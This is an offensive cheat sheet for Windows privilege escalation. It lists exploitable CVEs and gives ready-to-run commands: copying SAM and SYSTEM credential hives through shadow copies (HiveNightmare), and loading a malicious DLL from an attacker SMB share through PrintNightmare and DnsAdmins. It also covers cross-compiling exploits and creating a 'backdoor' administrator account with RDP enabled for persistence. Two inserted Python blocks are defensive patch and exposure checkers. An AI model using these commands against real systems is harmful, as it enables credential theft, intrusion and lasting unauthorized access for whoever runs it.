PrivEsc - Kernel & Exploits


Last resort on Windows, same rule as Linux: try W03-W07 first. Kernel exploits can BSOD a box.

i. Get the patch state

systeminfo > si.txt
type si.txt | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
type si.txt | findstr /N "KB"

Note: systeminfo lists installed hotfixes. Missing patches = exploit candidates.

PowerShell:

Get-HotFix | Sort-Object -Descending InstalledOn | Select-Object HotFixID,InstalledOn -First 30

ii. Run a suggester

wesng (Windows-Exploit-Suggester-NG, the modern one):

## On attacker:
pip install wesng
wes --update
wes /tmp/si.txt -o report.txt
## Filter only Elevation of Privilege:
wes /tmp/si.txt --impact 'Elevation of Privilege' -o eop.txt

Old Windows-Exploit-Suggester (still useful for legacy):

windows-exploit-suggester.py --database 2024-*.xls --systeminfo si.txt

Read the suggester output by exploit availability and reliability. The high-confidence ones with public PoC are what you try.
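The matching a suggester performs, reduced to its core as an added example (not part of this cheat sheet and not wesng's code): parse systeminfo output for build, architecture and installed KBs, then report which entries of a supplied patch baseline are absent. The systeminfo text and the KB numbers in the baseline are constructed placeholders, not real Microsoft updates.

```python
import re

# Constructed, abbreviated systeminfo output; not captured from a real host.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19043 N/A Build 19043
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1000001
                           [02]: KB1000002
                           [03]: KB1000004
"""

# Constructed patch baseline: the KB numbers are placeholders, not real updates.
# A real baseline maps the KBs that fix the CVEs in the table below to their CVE ids.
REQUIRED_PATCHES = {
    "KB1000001": "placeholder servicing stack update",
    "KB1000003": "placeholder cumulative update",
    "KB1000004": "placeholder out-of-band fix",
}


def parse_systeminfo(text):
    """Return (os_name, build_number, arch, installed_kbs) from English systeminfo output."""
    def field(label):
        m = re.search(r"^%s:\s*(.+?)\s*$" % re.escape(label), text, re.M)
        return m.group(1) if m else ""
    build = re.search(r"Build (\d+)", field("OS Version"))
    arch = "x64" if "x64-based" in field("System Type") else "x86"
    installed = set(re.findall(r"\[\d+\]:\s*(KB\d+)", text))  # hotfix list entries
    return field("OS Name"), int(build.group(1)) if build else None, arch, installed


def missing_patches(text, required=REQUIRED_PATCHES):
    """Baseline KBs absent from the host's hotfix list: the suggester's core test."""
    installed = parse_systeminfo(text)[3]
    return {kb: why for kb, why in required.items() if kb not in installed}


if __name__ == "__main__":
    name, build, arch, kbs = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{name} build {build} ({arch}), {len(kbs)} hotfixes installed")
    for kb, why in missing_patches(SAMPLE_SYSTEMINFO).items():
        print(f"missing {kb}: {why}")
```

Treat a missing KB as a candidate only: supersession means a newer cumulative update can cover an older KB that never shows up in the hotfix list, which is why wesng carries its own supersedence data.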

iii. The big-name Windows privesc exploits

| CVE | Name | Affects | Notes |
|---|---|---|---|
| CVE-2021-36934 | HiveNightmare / SeriousSAM | Win10 1809 - Win11 (until July 2021) | Non-admin reads SAM via VSS. Very reliable. |
| CVE-2021-34527, 1675 | PrintNightmare | All Windows with Spooler enabled | Remote and local variants, public PoC. |
| CVE-2021-1732 | Win32k privesc | Win10 1909+ | Public PoC, used in the wild. |
| CVE-2020-0796 | SMBGhost | Win10 1903, 1909 | LPE and RCE variants. |
| CVE-2020-1054 | Win32k EOP | Win10, Server 2019 | Public PoC. |
| CVE-2020-0668 | Modules Installer | Many Win10 | Symbolic-link race. |
| CVE-2019-1388 | UAC Certificate Dialog | Win7, Server 2008 | Click “Show certificate” -> SYSTEM. |
| CVE-2019-0708 | BlueKeep | Win7, 2008, 2008 R2 RDP | Pre-auth RCE. |
| CVE-2018-8120 | Win32k EOP | Win7, 2008 R2 | Reliable public PoC. |
| CVE-2017-0213 | COM Aggregate Marshaler | Many | Reliable, runs as SYSTEM. |
| CVE-2017-0143 etc | EternalBlue / MS17-010 | Win7, 2008 R2 SMBv1 | Famous. RCE -> SYSTEM. |
| CVE-2016-3309 | Win32k EOP | Win7, 2008-2012 R2 | Public PoC. |
| CVE-2014-4113 | TrackPopupMenu | Win7-2012 | Old but legendary. |

iv. HiveNightmare (CVE-2021-36934)

The most reliable modern Windows EOP, no admin needed:

icacls C:\Windows\System32\config\SAM
## "BUILTIN\Users:(I)(RX)" means vulnerable

Read SAM/SYSTEM/SECURITY from a Volume Shadow Copy:

mklink /D C:\Temp\vss \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
copy C:\Temp\vss\Windows\System32\config\SAM C:\Windows\Temp\
copy C:\Temp\vss\Windows\System32\config\SYSTEM C:\Windows\Temp\
copy C:\Temp\vss\Windows\System32\config\SECURITY C:\Windows\Temp\

Or use the public PoC: HiveNightmare.exe from GitHub. Then parse the copied hives on the attacker box with impacket-secretsdump LOCAL. See PrivEsc - Credentials & Files.
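An added exposure check for this section (my code, not the cheat sheet's or the HiveNightmare PoC's): it generalizes the single "BUILTIN\Users:(I)(RX)" string above to any allow ACE that grants Users read, and adds the second precondition, an existing shadow copy, since the live SAM is locked and the weak ACL only matters on a VSS snapshot. Both command outputs are constructed samples with fake GUIDs.

```python
import re

# Constructed sample of `icacls C:\Windows\System32\config\SAM` on an exposed build.
SAMPLE_ICACLS = r"""C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed excerpt of `vssadmin list shadows` with one shadow copy (GUIDs are fake).
SAMPLE_VSSADMIN = r"""Contents of shadow copy set ID: {11111111-2222-3333-4444-555555555555}
   Contained 1 shadow copies at creation time: 7/10/2021 9:00:00 AM
      Shadow Copy ID: {66666666-7777-8888-9999-aaaaaaaaaaaa}
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
"""

SIMPLE_READ = {"F", "M", "RX", "R"}   # icacls simple rights that include read
SPECIFIC_READ = {"GR", "RD"}          # generic read / read data in explicit-rights form


def users_can_read(icacls_output):
    """True if any allow ACE for BUILTIN\\Users grants read on the listed file."""
    for m in re.finditer(r"BUILTIN\\Users:((?:\([A-Z,]+\))+)", icacls_output):
        ace = m.group(1)
        if "(DENY)" in ace:           # a deny ACE does not create the exposure
            continue
        for tok in re.findall(r"\(([A-Z,]+)\)", ace):
            if tok in SIMPLE_READ or set(tok.split(",")) & SPECIFIC_READ:
                return True
    return False


def shadow_copies(vssadmin_output):
    """Device paths of existing shadow copies; without one the weak ACL is not reachable."""
    return re.findall(r"Shadow Copy Volume:\s*(\S+)", vssadmin_output)


def hivenightmare_exposure(icacls_output, vssadmin_output):
    """'exposed' = weak ACL and a shadow copy, 'latent' = weak ACL only, 'ok' = ACL fine."""
    weak = users_can_read(icacls_output)
    if weak and shadow_copies(vssadmin_output):
        return "exposed"
    return "latent" if weak else "ok"
```

Microsoft's published workaround for this bug restores inheritance on the config directory (`icacls %windir%\system32\config\*.* /inheritance:e`) and deletes existing shadow copies; a "latent" host still needs the ACL fixed, because the next restore point recreates the exposure.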

v. PrintNightmare (CVE-2021-34527, CVE-2021-1675)

Spooler abuse, two variants:

  • Local: any user adds a driver as SYSTEM
  • Remote: authenticated user on any host adds driver to a DC

Local privesc:

## Public PoC: SharpPrintNightmare.exe or CVE-2021-1675.py
## Build a malicious DLL that spawns SYSTEM shell, then:
SharpPrintNightmare.exe C:\Windows\Temp\evil.dll

Remote against a DC (from any domain user):

impacket-rpcdump 'corp.local'/'user':'pass'@10.10.11.50 | grep MS-PAR
## then:
python3 CVE-2021-1675.py corp.local/user:pass@10.10.11.50 '\\10.10.14.1\share\evil.dll'

vi. CVE-2019-1388 (Win7/2008)

UAC dialog certificate trick, requires you to be logged into the console (RDP works):

## During UAC prompt, click "Show information about this publisher's certificate"
## In the cert dialog, click on a URL link
## Browser opens as SYSTEM
## Save As -> navigate -> open cmd.exe as SYSTEM

vii. PoC sources

Build your own from the original PoC. These repos cover most CVEs above:

For modern boxes, search GitHub for CVE-YYYY-XXXXX PoC directly. Quality varies.

viii. Compilation cheatsheet

If the PoC is C/C++ source and there is no compiler on the target, cross-compile on the attacker box:

## 64-bit Windows
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32 -static
## 32-bit Windows
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32 -static

For .NET / C# PoCs, build on Windows attacker box or use Visual Studio Online.

ix. Pre-flight before kernel exploit

Same as Linux PrivEsc - Kernel & Exploits:

  • Confirm OS build + arch with systeminfo
  • Match exploit’s supported build exactly
  • Test on a snapshot if you have one
  • Have a callback ready; kernel exploits often kill the shell after firing

## Tell the exploit where to drop the shell, or compile your callback in
## If exploit needs an EXE to run as SYSTEM, point at a meterpreter or nc:
exploit.exe C:\Windows\Temp\sh.exe

x. When kernel exploits fail

  • Wrong build / patch level -> recheck systeminfo
  • Defender / EDR catches the binary -> see Defender & AMSI Evasion
  • Exploit BSOD’s the box -> different exploit
  • Exploit works once, then fails on retry -> some patch was applied between attempts
  • Userland triggers but no SYSTEM shell -> check if the binary you specified is signed/blocked

xi. Non-kernel “kernel-ish” tricks

These aren’t kernel but they hit modern Windows:

DnsAdmins DLL loading (member of DnsAdmins group):

dnscmd.exe /config /serverlevelplugindll \\10.10.14.1\share\evil.dll
sc.exe stop dns & sc.exe start dns

Backup Operators -> SAM (any non-admin in this group): See PrivEsc - Tokens & Privileges -> SeBackup.

Server Operators -> service binary: members can modify service config -> instant SYSTEM via service binary swap, see PrivEsc - Services & Registry.

Storage Replica Administrators / Hyper-V Admins: less direct but powerful, look up specific abuses per role.

xii. After kernel privesc, persist

Same as Linux. Lock in stable SYSTEM access before doing anything destructive:

## Add a local admin you control
net user backdoor "Passw0rd!" /add
net localgroup Administrators backdoor /add
## Enable RDP if it isn't
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

See Persistence & Cleanup for the cleanup pass.